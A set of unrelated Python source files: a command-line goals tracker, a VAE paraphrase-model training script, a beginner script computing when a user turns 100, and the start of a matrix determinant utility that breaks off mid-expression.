def get_goal_file_path(goal_name):
return GOALS_CONFIG_FOLDER_PATH + '/' + goal_name + '.yaml'
def process(input):
"""
the main process
:param input:
"""
_input = input.lower().strip()
check_sub_command(_input)
def check_sub_command(c):
"""
command checker
:param c:
:return:
"""
sub_commands = {
'new': new_goal,
'tasks': view_related_tasks,
'view': list_goals,
'complete': complete_goal,
'analyze': goals_analysis,
}
try:
return sub_commands[c]()
except KeyError:
click.echo(chalk.red('Command does not exist!'))
click.echo('Try "yoda goals --help" for more info')
def goals_dir_check():
"""
check if goals directory exists. If not, create
"""
if not os.path.exists(GOALS_CONFIG_FOLDER_PATH):
try:
os.makedirs(GOALS_CONFIG_FOLDER_PATH)
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
def append_data_into_file(data, file_path):
"""
append data into existing file
:param data:
:param file_path:
"""
with open(file_path) as file:
# read contents
contents = yaml.load(file)
contents['entries'].append(
data
)
# enter data
with open(file_path, "w") as file:
yaml.dump(contents, file, default_flow_style=False)
def complete_goal():
"""
complete a goal
"""
not_valid_goal_number = 1
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
with open(GOALS_CONFIG_FILE_PATH) as todays_tasks_entry:
contents = yaml.load(todays_tasks_entry)
i = 0
no_goal_left = True
for entry in contents['entries']:
i += 1
if entry['status'] == 0:
no_goal_left = False
if no_goal_left:
click.echo(chalk.green(
'All goals have been completed! Add a new goal by entering "yoda goals new"'))
else:
click.echo('Goals:')
click.echo('----------------')
click.echo("Number | Deadline | Goal")
click.echo("-------|-------------|-----")
i = 0
for entry in contents['entries']:
i += 1
deadline = entry['deadline']
text = entry['text'] if entry['status'] == 0 else strike(
entry['text'])
if entry['status'] == 0:
click.echo(" " + str(i) + " | " +
deadline + " | " + text)
while not_valid_goal_number:
click.echo(chalk.blue(
'Enter the goal number that you would like to set as completed'))
goal_to_be_completed = int(input())
if goal_to_be_completed > len(contents['entries']):
click.echo(chalk.red('Please Enter a valid goal number!'))
else:
contents['entries'][goal_to_be_completed - 1]['status'] = 1
input_data(contents, GOALS_CONFIG_FILE_PATH)
not_valid_goal_number = 0
else:
click.echo(chalk.red(
'There are no goals set. Set a new goal by entering "yoda goals new"'))
def goal_name_exists(goal_name):
file_name = get_goal_file_path(goal_name)
return os.path.isfile(file_name)
def new_goal():
"""
new goal
"""
goals_dir_check()
goal_name_not_ok = True
click.echo(chalk.blue('Input a single-word name of the goal:'))
while goal_name_not_ok:
goal_name = input().strip()
if goal_name.isalnum():
goal_name_not_ok = False
else:
click.echo(chalk.red('Only alphanumeric characters can be used! Please input the goal name:'))
if goal_name_exists(goal_name):
click.echo(chalk.red(
'A goal with this name already exists. Please type "yoda goals view" to see a list of existing goals'))
else:
click.echo(chalk.blue('Input description of the goal:'))
text = input().strip()
click.echo(chalk.blue('Input due date for the goal (YYYY-MM-DD):'))
incorrect_date_format = True
while incorrect_date_format:
deadline = input().strip()
try:
date_str = datetime.datetime.strptime(deadline, '%Y-%m-%d').strftime('%Y-%m-%d')
if date_str != deadline:
raise ValueError
incorrect_date_format = False
except ValueError:
click.echo(chalk.red("Incorrect data format, should be YYYY-MM-DD. Please repeat:"))
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
setup_data = dict(
name=goal_name,
text=text,
deadline=deadline,
status=0
)
append_data_into_file(setup_data, GOALS_CONFIG_FILE_PATH)
else:
setup_data = dict(
entries=[
dict(
name=goal_name,
text=text,
deadline=deadline,
status=0
)
]
)
input_data(setup_data, GOALS_CONFIG_FILE_PATH)
input_data(dict(entries=[]), get_goal_file_path(goal_name))
def goals_analysis():
"""
goals analysis
"""
now = datetime.datetime.now()
total_goals = 0
total_incomplete_goals = 0
total_missed_goals = 0
total_goals_next_week = 0
total_goals_next_month = 0
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
with open(GOALS_CONFIG_FILE_PATH) as goals_file:
contents = yaml.load(goals_file)
for entry in contents['entries']:
total_goals += 1
if entry['status'] == 0:
total_incomplete_goals += 1
deadline = datetime.datetime.strptime(entry['deadline'], '%Y-%m-%d')
total_missed_goals += (1 if deadline < now else 0)
total_goals_next_week += (1 if (deadline-now).days <= 7 else 0)
total_goals_next_month += (1 if (deadline - now).days <= 30 else 0)
percent_incomplete_goals = total_incomplete_goals * 100 / total_goals
percent_complete_goals = 100 - percent_incomplete_goals
click.echo(chalk.red('Percentage of incomplete goals : ' + str(percent_incomplete_goals)))
click.echo(chalk.green('Percentage of completed goals : ' + str(percent_complete_goals)))
click.echo(chalk.blue('Number of missed deadlines : ' + str(total_missed_goals)))
click.echo(chalk.blue('Number of goals due within the next week : ' + str(total_goals_next_week)))
click.echo(chalk.blue('Number of goals due within the next month : ' + str(total_goals_next_month)))
else:
click.echo(chalk.red(
'There are no goals set. Set a new goal by entering "yoda goals new"'))
def add_task_to_goal(goal_name, date, timestamp):
goal_filename = get_goal_file_path(goal_name)
if os.path.isfile(goal_filename):
setup_data = dict(
date=date,
timestamp=timestamp
)
append_data_into_file(setup_data, goal_filename)
return True
return False
def list_goals():
"""
get goals listed chronologically by deadlines
"""
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
with open(GOALS_CONFIG_FILE_PATH) as goals_file:
contents = yaml.load(goals_file)
if len(contents):
contents['entries'].sort(key=lambda x: x['deadline'].split('-'))
click.echo('Goals')
click.echo('----------------')
click.echo("Status | Deadline | Name: text")
click.echo("-------|-------------|---------------")
incomplete_goals = 0
total_tasks = 0
total_missed_deadline = 0
for entry in contents['entries']:
total_tasks += 1
incomplete_goals += (1 if entry['status'] == 0 else 0)
deadline = entry['deadline']
name = entry['name']
text = entry['text'] if entry['status'] == 0 else strike(
entry['text'])
status = "O" if entry['status'] == 0 else "X"
deadline_time = datetime.datetime.strptime(deadline, '%Y-%m-%d')
now = datetime.datetime.now()
total_missed_deadline += (1 if deadline_time < now else 0)
click.echo(" " + status + " | " + deadline + " | #" + name + ": " + text)
click.echo('----------------')
click.echo('')
click.echo('Summary:')
click.echo('----------------')
if incomplete_goals == 0:
click.echo(chalk.green(
'All goals have been completed! Set a new goal by entering "yoda goals new"'))
else:
click.echo(chalk.red("Incomplete tasks: " + str(incomplete_goals)))
click.echo(chalk.red("Tasks with missed deadline: " + str(total_missed_deadline)))
click.echo(chalk.green("Completed tasks: " +
str(total_tasks - incomplete_goals)))
else:
click.echo(
'There are no goals set. Set a new goal by entering "yoda goals new"')
else:
click.echo(
'There are no goals set. Set a new goal by entering "yoda goals new"')
def view_related_tasks():
"""
list tasks assigned to the goal
"""
from .diary import get_task_info
not_valid_name = True
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
while not_valid_name:
click.echo(chalk.blue(
'Enter the goal name that you would like to examine'))
goal_name = input()
goal_file_name = get_goal_file_path(goal_name)
if os.path.isfile(goal_file_name):
not_valid_name = False
with open(goal_file_name) as goals_file:
contents = yaml.load(goals_file)
if len(contents['entries']):
total_tasks = 0
total_incomplete = 0
click.echo('Tasks assigned to the goal:')
click.echo('----------------')
click.echo("Status | Date | Text")
click.echo("-------|---------|-----")
for entry in contents['entries']:
timestamp = entry['timestamp']
date = entry['date']
status, text = get_task_info(timestamp, date)
total_tasks += 1
total_incomplete += (1 if status == 0 else 0)
text = text if status == 0 else strike(text)
status = "O" if status == 0 else "X"
click.echo(" " + status + " | " + date + "| " + text)
click.echo('----------------')
click.echo('')
click.echo('Summary:')
click.echo('----------------')
click.echo(chalk.red("Incomplete tasks assigned to the goal: " + str(total_incomplete)))
click.echo(chalk.green("Completed tasks assigned to the goal: " +
str(total_tasks - total_incomplete)))
else:
click.echo(chalk.red(
'There are no tasks assigned to the goal. Add a new task by entering "yoda diary nt"'))
else:
click.echo(chalk.red(
'There are no goals set. Set a new goal by entering "yoda goals new"'))
|
python
|
from __future__ import absolute_import
import argparse
import os
import sys
# sys.path.append(".")
import time
import torch
from tensorboardX import SummaryWriter
from metrics.evaluation import evaluate
from metrics.vae_metrics import VaeEvaluator
from struct_self.dataset import Dataset
from struct_self.dataset import to_example
from utils.config_utils import dict_to_args
from utils.config_utils import yaml_load_dict
from utils.vae_utils import get_eval_dir
from utils.vae_utils import get_exp_info
from utils.vae_utils import create_model
from utils.vae_utils import load_data
from utils.vae_utils import load_model
from utils.vae_utils import log_tracker
from utils.vae_utils import lr_schedule
def train_ae(main_args, model_args, model=None):
train_set, dev_set = load_data(main_args)
model, optimizer, vocab = create_model(main_args, model_args, model)
print('begin training, %d training examples, %d dev examples' % (len(train_set), len(dev_set)), file=sys.stderr)
print('vocab: %s' % repr(vocab.src), file=sys.stderr)
epoch = 0
train_iter = 0
report_loss = report_examples = 0.
history_dev_scores = []
num_trial = patience = 0
model_dir, log_dir = get_exp_info(main_args=main_args, model_args=model_args)
model_file = model_dir + '.bin'
writer = SummaryWriter(log_dir)
while True:
epoch += 1
epoch_begin = time.time()
for batch_examples in train_set.batch_iter(batch_size=main_args.batch_size, shuffle=True):
train_iter += 1
optimizer.zero_grad()
loss = -model.score(batch_examples)
loss_val = torch.sum(loss).item()
report_loss += loss_val
report_examples += len(batch_examples)
loss = torch.mean(loss)
loss.backward()
if main_args.clip_grad > 0.:
torch.nn.utils.clip_grad_norm_(model.parameters(), main_args.clip_grad)
optimizer.step()
if train_iter % main_args.log_every == 0:
print('\r[Iter %d] encoder loss=%.5f' %
(train_iter,
report_loss / report_examples),
file=sys.stderr, end=" ")
writer.add_scalar(
tag='AutoEncoder/Train/loss',
scalar_value=report_loss / report_examples,
global_step=train_iter
)
writer.add_scalar(
tag='optimize/lr',
scalar_value=optimizer.param_groups[0]['lr'],
global_step=train_iter,
)
report_loss = report_examples = 0.
if train_iter % main_args.dev_every == 0:
print()
print('\r[Iter %d] begin validation' % train_iter, file=sys.stderr)
eval_start = time.time()
eval_results = evaluate(examples=dev_set.examples, model=model, eval_src='src', eval_tgt='src')
dev_acc = eval_results['accuracy']
print('\r[Iter %d] auto_encoder %s=%.5f took %ds' % (
train_iter, model.args.eval_mode, dev_acc, time.time() - eval_start),
file=sys.stderr)
writer.add_scalar(
tag='AutoEncoder/Dev/%s' % model.args.eval_mode,
scalar_value=dev_acc,
global_step=train_iter
)
is_better = history_dev_scores == [] or dev_acc > max(history_dev_scores)
history_dev_scores.append(dev_acc)
writer.add_scalar(
tag='AutoEncoder/Dev/best %s' % model.args.eval_mode,
scalar_value=max(history_dev_scores),
global_step=train_iter
)
model, optimizer, num_trial, patience = lr_schedule(
is_better=is_better,
model_dir=model_dir,
model_file=model_file,
main_args=main_args,
patience=patience,
num_trial=num_trial,
epoch=epoch,
model=model,
optimizer=optimizer,
reload_model=False
)
epoch_time = time.time() - epoch_begin
print('\r[Epoch %d] epoch elapsed %ds' % (epoch, epoch_time), file=sys.stderr)
writer.add_scalar(
tag='AutoEncoder/epoch elapsed',
scalar_value=epoch_time,
global_step=epoch
)
def train_vae(main_args, model_args, model=None):
ts = time.strftime('%Y-%b-%d-%H:%M:%S', time.gmtime())
train_set, dev_set = load_data(main_args)
model, optimizer, vocab = create_model(main_args, model_args, model)
model_dir, logdir = get_exp_info(main_args=main_args, model_args=model_args)
model_file = model_dir + '.bin'
eval_dir = get_eval_dir(main_args=main_args, model_args=model_args, mode='Trains')
evaluator = VaeEvaluator(
model=model,
out_dir=eval_dir,
train_batch_size=main_args.batch_size,
eval_batch_size=model_args.eval_bs,
)
# if model_args.tensorboard_logging:
writer = SummaryWriter(logdir)
writer.add_text("model", str(model))
writer.add_text("args", str(main_args))
writer.add_text("ts", ts)
train_iter = main_args.start_iter
epoch = num_trial = patience = 0
history_elbo = []
history_bleu = []
max_kl_item = -1
max_kl_weight = None
continue_anneal = model_args.peak_anneal
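# Peak annealing (as implemented in the dev-evaluation branch further down):
# while annealing, track the largest dev KL term seen so far; once the KL term
# drops by more than model_args.stop_clip_kl below that peak, freeze the KL
# weight at the value it had when the peak was reached.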
if model_args.peak_anneal:
model_args.warm_up = 0
memory_temp_count = 0
t_type = torch.Tensor
adv_select = ["ADVCoupleVAE", "VSAE", "ACVAE", "DVAE", "SVAE"]
if model_args.model_select in adv_select:
if not model_args.dis_train:
x = input("you forget set the dis training?,switch it?[Y/N]")
model_args.dis_train = (x.lower() == "y")
adv_training = model_args.dis_train and model_args.model_select in adv_select
if adv_training:
print("has the adv training process")
adv_syn = model_args.adv_syn > 0. or model_args.infer_weight * model_args.inf_sem
adv_sem = model_args.adv_sem > 0. or model_args.infer_weight * model_args.inf_syn
print(model_args.dev_item.lower())
while True:
epoch += 1
train_track = {}
for batch_examples in train_set.batch_iter(batch_size=main_args.batch_size, shuffle=True):
train_iter += 1
if adv_training:
ret_loss = model.get_loss(batch_examples, train_iter, is_dis=True)
if adv_syn:
dis_syn_loss = ret_loss['dis syn']
optimizer.zero_grad()
dis_syn_loss.backward()
if main_args.clip_grad > 0.:
torch.nn.utils.clip_grad_norm_(model.parameters(), main_args.clip_grad)
# optimizer.step()
if adv_sem:
ret_loss = model.get_loss(batch_examples, train_iter, is_dis=True)
dis_sem_loss = ret_loss['dis sem']
optimizer.zero_grad()
dis_sem_loss.backward()
if main_args.clip_grad > 0.:
torch.nn.utils.clip_grad_norm_(model.parameters(), main_args.clip_grad)
# optimizer.step()
ret_loss = model.get_loss(batch_examples, train_iter)
loss = ret_loss['Loss']
optimizer.zero_grad()
loss.backward()
if main_args.clip_grad > 0.:
torch.nn.utils.clip_grad_norm_(model.parameters(), main_args.clip_grad)
optimizer.step()
train_iter += 1
# tracker = update_track(loss, train_avg_kl, train_avg_nll, tracker)
train_track = log_tracker(ret_loss, train_track)
if train_iter % main_args.log_every == 0:
train_avg_nll = ret_loss['NLL Loss']
train_avg_kl = ret_loss['KL Loss']
_kl_weight = ret_loss['KL Weight']
for key, val in ret_loss.items():
writer.add_scalar(
'Train-Iter/VAE/{}'.format(key),
val.item() if isinstance(val, t_type) else val,
train_iter
)
print("\rTrain-Iter %04d, Loss %9.4f, NLL-Loss %9.4f, KL-Loss %9.4f, KL-Weight %6.3f, WD-Drop %6.3f"
% (train_iter, loss.item(), train_avg_nll, train_avg_kl, _kl_weight, model.step_unk_rate),
end=' ')
writer.add_scalar(
tag='optimize/lr',
scalar_value=optimizer.param_groups[0]['lr'],
global_step=train_iter,
)
if train_iter % main_args.dev_every == 0 and train_iter > model_args.warm_up:
# dev_track, eval_results = _test_vae(model, dev_set, main_args, train_iter)
dev_track, eval_results = evaluator.evaluate_reconstruction(examples=dev_set.examples,
eval_desc="dev{}".format(train_iter),
eval_step=train_iter, write_down=False)
_weight = model.get_kl_weight(step=train_iter)
_kl_item = torch.mean(dev_track['KL Item'])
# writer.add_scalar("VAE/Valid-Iter/KL Item", _kl_item, train_iter)
for key, val in dev_track.items():
writer.add_scalar(
'Valid-Iter/VAE/{}'.format(key),
torch.mean(val) if isinstance(val, t_type) else val,
train_iter
)
if continue_anneal and model.step_kl_weight is None:
if _kl_item > max_kl_item:
max_kl_item = _kl_item
max_kl_weight = _weight
else:
if (max_kl_item - _kl_item) > model_args.stop_clip_kl:
model.step_kl_weight = max_kl_weight
writer.add_text(tag='peak_anneal',
text_string="fixed the kl weight:{} with kl peak:{} at step:{}".format(
max_kl_weight,
max_kl_item,
train_iter
), global_step=train_iter)
continue_anneal = False
dev_elbo = torch.mean(dev_track['Model Score'])
writer.add_scalar("Evaluation/VAE/Dev Score", dev_elbo, train_iter)
# evaluate bleu
dev_bleu = eval_results['accuracy']
print()
print("Valid-Iter %04d, NLL_Loss:%9.4f, KL_Loss: %9.4f, Sum Score:%9.4f BLEU:%9.4f" % (
train_iter,
torch.mean(dev_track['NLL Loss']),
torch.mean(dev_track['KL Loss']),
dev_elbo,
eval_results['accuracy']), file=sys.stderr
)
writer.add_scalar(
tag='Evaluation/VAE/Iter %s' % model.args.eval_mode,
scalar_value=dev_bleu,
global_step=train_iter
)
if model_args.dev_item == "ELBO" or model_args.dev_item.lower() == "para-elbo" or model_args.dev_item.lower() == "gen-elbo":
is_better = history_elbo == [] or dev_elbo < min(history_elbo)
elif model_args.dev_item == "BLEU" or model_args.dev_item.lower() == "para-bleu" or model_args.dev_item.lower() == "gen-bleu":
is_better = history_bleu == [] or dev_bleu > max(history_bleu)
history_elbo.append(dev_elbo)
writer.add_scalar("Evaluation/VAE/Best Score", min(history_elbo), train_iter)
history_bleu.append(dev_bleu)
writer.add_scalar("Evaluation/VAE/Best BLEU Score", max(history_bleu), train_iter)
if is_better:
writer.add_scalar(
tag='Evaluation/VAE/Best %s' % model.args.eval_mode,
scalar_value=dev_bleu,
global_step=train_iter
)
writer.add_scalar(
tag='Evaluation/VAE/Best NLL-LOSS',
scalar_value=torch.mean(dev_track['NLL Loss']),
global_step=train_iter
)
writer.add_scalar(
tag='Evaluation/VAE/Best KL-LOSS',
scalar_value=torch.mean(dev_track['KL Loss']),
global_step=train_iter
)
if train_iter * 2 > model_args.x0:
memory_temp_count = 3
if model_args.dev_item.lower().startswith("gen") and memory_temp_count > 0:
evaluator.evaluate_generation(
sample_size=len(dev_set.examples),
eval_desc="gen_iter{}".format(train_iter),
)
memory_temp_count -= 1
if model_args.dev_item.lower().startswith("para") and memory_temp_count > 0:
para_score = evaluator.evaluate_para(
eval_dir="/home/user_data/baoy/projects/seq2seq_parser/data/quora-mh/unsupervised",
# eval_list=["para.raw.text", "para.text"])
# eval_list=["para.raw.text"])
eval_list=["dev.para.txt", "test.para.txt"],
eval_desc="para_iter{}".format(train_iter))
if memory_temp_count == 3:
writer.add_scalar(
tag='Evaluation/VAE/Para Dev Ori-BLEU',
scalar_value=para_score[0][0],
global_step=train_iter
)
writer.add_scalar(
tag='Evaluation/VAE/Para Dev Tgt-BLEU',
scalar_value=para_score[0][1],
global_step=train_iter
)
if len(para_score) > 1:
writer.add_scalar(
tag='Evaluation/VAE/Para Test Ori-BLEU',
scalar_value=para_score[1][0],
global_step=train_iter
)
writer.add_scalar(
tag='Evaluation/VAE/Para Test Tgt-BLEU',
scalar_value=para_score[1][1],
global_step=train_iter
)
memory_temp_count -= 1
model, optimizer, num_trial, patience = lr_schedule(
is_better=is_better,
model_dir=model_dir,
model_file=model_file,
main_args=main_args,
patience=patience,
num_trial=num_trial,
epoch=epoch,
model=model,
optimizer=optimizer,
reload_model=model_args.reload_model,
)
model.train()
elbo = torch.mean(train_track['Model Score'])
print()
print("Train-Epoch %02d, Score %9.4f" % (epoch, elbo))
for key, val in train_track.items():
writer.add_scalar(
'Train-Epoch/VAE/{}'.format(key),
torch.mean(val) if isinstance(val, t_type) else val,
epoch
)
def test_vae(main_args, model_args, input_mode=0):
model = load_model(main_args, model_args, check_dir=False)
out_dir = get_eval_dir(main_args=main_args, model_args=model_args, mode="Test")
model.eval()
if not os.path.exists(out_dir):
sys.exit(-1)
if model_args.model_select.startswith("Origin"):
model_args.eval_bs = 20 if model_args.eval_bs < 20 else model_args.eval_bs
evaluator = VaeEvaluator(
model=model,
out_dir=out_dir,
eval_batch_size=model_args.eval_bs,
train_batch_size=main_args.batch_size
)
train_exam = Dataset.from_bin_file(main_args.train_file).examples
para_eval_dir = "/home/user_data/baoy/projects/seq2seq_parser/data/quora-mh/unsupervised"
para_eval_list = ["dev.para.txt"]
# ["dev.para.txt", "test.para.txt"]
if input_mode == 0:
print("========dev reconstructor========")
test_set = Dataset.from_bin_file(main_args.dev_file)
evaluator.evaluate_reconstruction(examples=test_set.examples, eval_desc="dev")
print("finish")
print("========test reconstructor=======")
test_set = Dataset.from_bin_file(main_args.test_file)
evaluator.evaluate_reconstruction(examples=test_set.examples, eval_desc="test")
print("finish")
print("========generating samples=======")
evaluator.evaluate_generation(corpus_examples=train_exam, sample_size=len(test_set.examples), eval_desc="gen")
print("finish")
elif input_mode == 1:
print("========generating samples=======")
test_exam = Dataset.from_bin_file(main_args.test_file).examples
evaluator.evaluate_generation(corpus_examples=train_exam, sample_size=len(test_exam), eval_desc="gen")
print("finish")
elif input_mode == 2:
print("========generating paraphrase========")
evaluator.evaluate_para(eval_dir=para_eval_dir, eval_list=para_eval_list)
print("finish")
elif input_mode == 3:
print("========supervised generation========")
# evaluator.evaluate_control()
evaluator.evaluate_control(eval_dir=para_eval_dir, eval_list=para_eval_list)
print("finish")
elif input_mode == 4:
trans_eval_list = ["trans.length.txt", "trans.random.txt"]
print("========style transfer========")
evaluator.evaluate_style_transfer(eval_dir=para_eval_dir, eval_list=trans_eval_list, eval_desc="unmatch")
evaluator.evaluate_style_transfer(eval_dir=para_eval_dir, eval_list=para_eval_list, eval_desc="match")
print("finish")
elif input_mode == 5:
print("========random syntax select========")
evaluator.evaluate_pure_para(eval_dir=para_eval_dir, eval_list=para_eval_list)
print("finish")
else:
raw = input("raw sent: ")
while not raw.startswith("EXIT"):
e = to_example(raw)
words = model.predict(e)
print("origin:", " ".join(words[0][0][0]))
to_ref = input("ref syn : ")
while not to_ref.startswith("NEXT"):
syn_ref = to_example(to_ref)
ret = model.eval_adv(e, syn_ref)
if not model_args.model_select == "OriginVAE":
print("ref syntax: ", " ".join(ret['ref syn'][0][0][0]))
print("ori syntax: ", " ".join(ret['ori syn'][0][0][0]))
print("switch result: ", " ".join(ret['res'][0][0][0]))
to_ref = input("ref syn: ")
raw = input("input : ")
def process_args():
opt_parser = argparse.ArgumentParser()
opt_parser.add_argument('--config_files', type=str, help='config_files')
opt_parser.add_argument('--exp_name', type=str, help='config_files')
opt_parser.add_argument('--load_src_lm', type=str, default=None)
opt_parser.add_argument('--mode', type=str, default=None)
opt = opt_parser.parse_args()
configs = yaml_load_dict(opt.config_files)
base_args = dict_to_args(configs['base_configs']) if 'base_configs' in configs else None
baseline_args = dict_to_args(configs['baseline_configs']) if 'baseline_configs' in configs else None
prior_args = dict_to_args(configs['prior_configs']) if 'prior_configs' in configs else None
encoder_args = dict_to_args(configs['encoder_configs']) if 'encoder_configs' in configs else None
decoder_args = dict_to_args(configs['decoder_configs']) if 'decoder_configs' in configs else None
vae_args = dict_to_args(configs['vae_configs']) if 'vae_configs' in configs else None
ae_args = dict_to_args(configs["ae_configs"]) if 'ae_configs' in configs else None
if base_args is not None:
if opt.mode is not None:
base_args.mode = opt.mode
if opt.exp_name is not None:
base_args.exp_name = opt.exp_name
if opt.load_src_lm is not None:
base_args.load_src_lm = opt.load_src_lm
return {
'base': base_args,
"baseline": baseline_args,
'prior': prior_args,
'encoder': encoder_args,
"decoder": decoder_args,
"vae": vae_args,
"ae": ae_args,
}
if __name__ == "__main__":
config_args = process_args()
args = config_args['base']
if args.mode == "train_sent":
train_vae(args, config_args['vae'])
elif args.mode == "train_ae":
train_ae(args, config_args['ae'])
elif args.mode == "test_vae":
raw_sent = int(input("select test mode: "))
test_vae(args, config_args['vae'], input_mode=raw_sent)
elif args.mode == "test_vaea":
test_vae(args, config_args['vae'], input_mode=0)
elif args.mode == "test_generating":
test_vae(args, config_args['vae'], input_mode=1)
elif args.mode == "test_paraphrase":
test_vae(args, config_args['vae'], input_mode=2)
elif args.mode == "test_control":
test_vae(args, config_args['vae'], input_mode=3)
elif args.mode == "test_transfer":
test_vae(args, config_args['vae'], input_mode=4)
elif args.mode == "test_pure_para":
test_vae(args, config_args['vae'], input_mode=5)
else:
raise NotImplementedError
|
python
|
# coding= UTF-8
### Command line of python <filename> was getting angry till I added the line above. I think
### it needs to know what types of characters to expect (i.e. latin, korean, etc..)
import datetime
### I needed to switch to single quotes instead of double. I’m not sure why...
name = raw_input('Yo what yo name sucka? ')
age = int(raw_input('Just how ancient are you? '))
now = datetime.datetime.now()
#calculate when a person will be 100 years old by taking the
#current year, subtracting their current age then adding 100
#years.
def year_when_100(age):
when_you_will_be_100 = now.year - age + 100
return when_you_will_be_100
### The line below would not work until I put the variable answer before the function. From a
### computer’s mind, reading code left to right it will identify that there is an ‘empty’ variable
### named answer and oh okay we are going to run this function and put the returned result
### in it
answer = year_when_100(age)
print "%s, you will be 100 years old in the year %s\n" % (name, answer)
rub_it_in_num = int(raw_input('Give me a number, old fart? '))
print "%s, you will be 100 years old in the year %s\n" % (name, answer) * rub_it_in_num
|
python
|
# -*- coding: utf-8 -*-
# type: ignore
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2019 Caleb Bell <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import division
from math import sin, exp, pi, fabs, copysign, log, isinf, acos, cos, sqrt
import sys
REQUIRE_DEPENDENCIES = False
if not REQUIRE_DEPENDENCIES:
IS_PYPY = True
else:
try:
# The right way imports the platform module, which costs milliseconds to load!
# implementation = platform.python_implementation()
IS_PYPY = 'PyPy' in sys.version
except AttributeError:
IS_PYPY = False
#IS_PYPY = True # for testing
#if not IS_PYPY and not REQUIRE_DEPENDENCIES:
# try:
# import numpy as np
# except ImportError:
# np = None
__all__ = ['dot', 'inv', 'det', 'solve', 'norm2', 'inner_product',
'eye', 'array_as_tridiagonals', 'solve_tridiagonal', 'subset_matrix']
primitive_containers = frozenset([list, tuple])
def det(matrix):
"""Seem sto work fine.
>> from sympy import *
>> from sympy.abc import *
>> Matrix([[a, b], [c, d]]).det()
a*d - b*c
>> Matrix([[a, b, c], [d, e, f], [g, h, i]]).det()
a*e*i - a*f*h - b*d*i + b*f*g + c*d*h - c*e*g
A few terms can be slightly factored out of the 3x dim.
>> Matrix([[a, b, c, d], [e, f, g, h], [i, j, k, l], [m, n, o, p]]).det()
a*f*k*p - a*f*l*o - a*g*j*p + a*g*l*n + a*h*j*o - a*h*k*n - b*e*k*p + b*e*l*o + b*g*i*p - b*g*l*m - b*h*i*o + b*h*k*m + c*e*j*p - c*e*l*n - c*f*i*p + c*f*l*m + c*h*i*n - c*h*j*m - d*e*j*o + d*e*k*n + d*f*i*o - d*f*k*m - d*g*i*n + d*g*j*m
72 mult vs ~48 in the cse'd version
Commented out - takes a few seconds
>> #Matrix([[a, b, c, d, e], [f, g, h, i, j], [k, l, m, n, o], [p, q, r, s, t], [u, v, w, x, y]]).det()
260 multiplies with cse; 480 without it.
"""
size = len(matrix)
if size == 1:
return matrix[0]
elif size == 2:
(a, b), (c, d) = matrix
return a*d - c*b
elif size == 3:
(a, b, c), (d, e, f), (g, h, i) = matrix
return a*(e*i - h*f) - d*(b*i - h*c) + g*(b*f - e*c)
elif size == 4:
(a, b, c, d), (e, f, g, h), (i, j, k, l), (m, n, o, p) = matrix
return (a*f*k*p - a*f*l*o - a*g*j*p + a*g*l*n + a*h*j*o - a*h*k*n
- b*e*k*p + b*e*l*o + b*g*i*p - b*g*l*m - b*h*i*o + b*h*k*m
+ c*e*j*p - c*e*l*n - c*f*i*p + c*f*l*m + c*h*i*n - c*h*j*m
- d*e*j*o + d*e*k*n + d*f*i*o - d*f*k*m - d*g*i*n + d*g*j*m)
elif size == 5:
(a, b, c, d, e), (f, g, h, i, j), (k, l, m, n, o), (p, q, r, s, t), (u, v, w, x, y) = matrix
x0 = s*y
x1 = a*g*m
x2 = t*w
x3 = a*g*n
x4 = r*x
x5 = a*g*o
x6 = t*x
x7 = a*h*l
x8 = q*y
x9 = a*h*n
x10 = s*v
x11 = a*h*o
x12 = r*y
x13 = a*i*l
x14 = t*v
x15 = a*i*m
x16 = q*w
x17 = a*i*o
x18 = s*w
x19 = a*j*l
x20 = q*x
x21 = a*j*m
x22 = r*v
x23 = a*j*n
x24 = b*f*m
x25 = b*f*n
x26 = b*f*o
x27 = b*h*k
x28 = t*u
x29 = b*h*n
x30 = p*x
x31 = b*h*o
x32 = b*i*k
x33 = p*y
x34 = b*i*m
x35 = r*u
x36 = b*i*o
x37 = b*j*k
x38 = s*u
x39 = b*j*m
x40 = p*w
x41 = b*j*n
x42 = c*f*l
x43 = c*f*n
x44 = c*f*o
x45 = c*g*k
x46 = c*g*n
x47 = c*g*o
x48 = c*i*k
x49 = c*i*l
x50 = p*v
x51 = c*i*o
x52 = c*j*k
x53 = c*j*l
x54 = q*u
x55 = c*j*n
x56 = d*f*l
x57 = d*f*m
x58 = d*f*o
x59 = d*g*k
x60 = d*g*m
x61 = d*g*o
x62 = d*h*k
x63 = d*h*l
x64 = d*h*o
x65 = d*j*k
x66 = d*j*l
x67 = d*j*m
x68 = e*f*l
x69 = e*f*m
x70 = e*f*n
x71 = e*g*k
x72 = e*g*m
x73 = e*g*n
x74 = e*h*k
x75 = e*h*l
x76 = e*h*n
x77 = e*i*k
x78 = e*i*l
x79 = e*i*m
return (x0*x1 - x0*x24 + x0*x27 + x0*x42 - x0*x45 - x0*x7 - x1*x6
+ x10*x11 - x10*x21 - x10*x44 + x10*x52 + x10*x69 - x10*x74
- x11*x20 + x12*x13 + x12*x25 - x12*x3 - x12*x32 - x12*x56
+ x12*x59 - x13*x2 + x14*x15 + x14*x43 - x14*x48 - x14*x57
+ x14*x62 - x14*x9 - x15*x8 + x16*x17 - x16*x23 - x16*x58
